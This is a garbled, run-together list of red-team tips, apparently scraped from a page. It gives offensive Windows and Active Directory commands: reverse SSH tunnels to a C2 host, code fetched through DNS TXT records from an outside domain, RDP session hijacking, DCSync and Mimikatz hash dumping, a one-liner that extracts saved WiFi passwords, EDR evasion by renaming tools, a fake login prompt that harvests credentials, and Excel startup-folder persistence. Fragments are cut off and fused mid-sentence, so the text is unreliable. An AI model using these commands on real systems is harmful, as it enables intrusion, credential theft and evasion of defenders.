nltest /dclist, nslookup -q=srv _kerberos._tcp
(domain suffix can autocomplete)ssh c2 -R *:80:localhost:80. SSH config GatewayPorts yes
C:\$Recycle.Bin
Task list
, netstat
and wmic process list full | findstr /I commandline
for more ideas!net users /domain
try using net use /dom
powershell -encodedcommand
? Try powershell -ec
powershell . (nslookup -q=txt calc.vincentyiu.co.uk )[-1]
\\127.0.0.1\c$
net use \\targetip\ipc$ password /u:domain\username
then sc
to psexec\\?\GLOBALROOT\Device\HarddiskVolumeShadowColy1\malware.exe/dll
then delete VSCsysteminfo | findstr /i boot
query user
to see who else is connected to the machine.net use * http://totallylegit.com/share
then start z:
sc create sesshijack binpath= "cmd.exe /k tscon <ID> /dest:<SESSIONNAME>"
then use putty sessionnslookup -q=srv _ldap._tcp
if its domain joined Invoke-Kerberoastwmic /node:"<computer>" OS get LastBootUpTime
in a for loopwmic /node:"host" process list brief
:) then look at RT #82sqldeveloper.exe
script
case sensitive and <registration
case insensitive.<havexhavex>
but not <havexDATABLOBhavex>
ping 8.8.8.8
works, try ICMP tunnelling. More info at http://www.labofapenetrationtester.com/2015/05/week-of-powershell-shells-day-5.html?m=1 from @fragsh3ll though only on immature networknslookup google.com
if it resolves you may have a DNS tunnelling problem.office2john
to get hash and crack in Hashcat!Invoke-MapDomainTrusts
from PowerView? Use @harmj0y DomainTrustExplorer to generate a graph https://github.com/sixdub/DomainTrustExplorerReplicating directory changes
rights, dcsync to pull hash using that account.secretsdump.py
? :) Try using the DC machine account to authenticate and dump instead of a user! Save hashcat IPs.txt | sort -t . -k1,1 -k2,2 -k3,3 -k4,4
or even `cat IPs.txt | sort -v"at.exe b64::[encoded params]
netsh wlan show profile name="ssid" key=clear
rpcping -s 127.0.0.1 -t ncacn_np
to leak hash.kill -9 $
ssh -l user target -T
Get-WmiObject -Class MicrosoftDNS_AType -NameSpace Root\MicrosoftDNS -ComputerName DC001 | Export-CSV -not dns.csv
C:\windows\system32\inetsrv\appcmd list site
to find IIS bindings.net view \\fileserv /all
to try other shares and folders!<scriptlet>
with <package>
and add <component id="test">
around the rest. Thx @subTeemsds-allowedtodelagateto
HTTP you can exploit to obtain HOST
and CIFS
whoami
? Use echo %userprofile%
echo %username%
Or replace echo with anything that reflects error: ie. set
Get-NetSubnet
, Get-NetSite
in PowerView or browse in AD explorer. Can help find your way :)WMIC /node:host process call create “echo > C:\windows\perfc”
/etc/dhcp/dhclient.conf
and remove gethostname()
for Opsec when you VPN or have to rock up on site.rundll32
, try control
@domchell and winword /L
@subTee ? change indicators!net users /domain
? Try out n^eT^1 us^er^s /do
rundll32.exe
a lot? Try copy it to another directory to appear as diff name. http://www.hexacorn.com/blog/2017/05/01/running-programs-via-proxy-jumping-on-a-edr-bypass-trampoline/lsadump::dcsync /all /csv
in Mimikatz to perform DRSUAPI grabbing of all hashes! Nice.Top297Million-Probable
, rockyou was decent for a quick smash, but lately found out about Keyboard Walks. Add keyboard walks with rules into your cracking routines to get more hashes cracked! https://github.com/hashcat/kwprocessor … Share your ideas!Get-ACL
on SYSVOL
. Works for me.Win32_Product
. Makes an event log entry for tons of MSIinstaller source. Holy crap, this is going on my black list.%USERPROFILE%\Links\Desktop.lnk
Mimikatz
to Mimidogz
will bypass China common security products such as 360. :)Domain user -> public role -> UNC leak -> relay or crack
using eg. Inveigh -> suddenly born as a new man! https://github.com/NetSPI/PowerUpSQL other cool bits in here worth noting. I do OS admin
to SYSADMIN
a lot! https://github.com/NetSPI/PowerUpSQL[img]url/cat.png[/img]
for example. Use https://github.com/vysec/basicAuth , set PNG as a PHP execution extension. Embed that PNG and whenever someone visits the page it will prompt for credentials."The supreme art of war is to subdue the enemy without fighting"
goaccess -> apt-get install goaccess
. Then goaccess -f /var/log/nginx/access.log
Pretty cool! Now you can see who's hitting your redirector and what they're grabbing at all times in live view? Good for red team dash boards.zgrep -f doms-filter.txt scans.gz | awk -F\"name\":\" '{print $2}' | awk -F"\",\"type '{print $1}' | tee -a doms-subs.txt
to get a nice list of subdomains for every DomLink recovered associated domain? :)type "C:\Users\%USERNAME%\AppData\Local\Google\Chrome\User Data\Default\Bookmarks.bak" | findstr /c "name url" | findstr /v "type"
Thank @francisacer1 for the path to Bookmarks.bak :Dhttps://login.windows.net/companyname.onmicrosoft.com/.well-known/openid-configuration
. Not sure why when I Google Tenant ID, people censor it out when it's publicly accessible without any authentication. Bunch of interesting output from the request anyhow.(netsh wlan show profiles) | Select-String '\:(.+)#x27; | %{$name=$_.Matches.Groups[1].Value.Trim(); $_} | %{(netsh wlan show profile name=$name key=clear)} | Select-String 'Key Content\W+\:(.+)#x27; | %{$pass=$_.Matches.Groups[1].Value.Trim(); $_} | %{[PSCustomObject]@{ PROFILE_NAME=$name;PASSWORD=$pass }}
HKLM\System\CurrentControlSet\Control\TerminalServer /v fSingleSessionPerUser /d 0
, to allow multiple sessions on a server per user. This is useful if you want to login to the jump-host, but that guy's just on all-day-long... 😶c:\users\%username%\appdata\roaming\microsoft\excel\xlstart\
There won't be any Macro prompts either because it's a trusted location by default.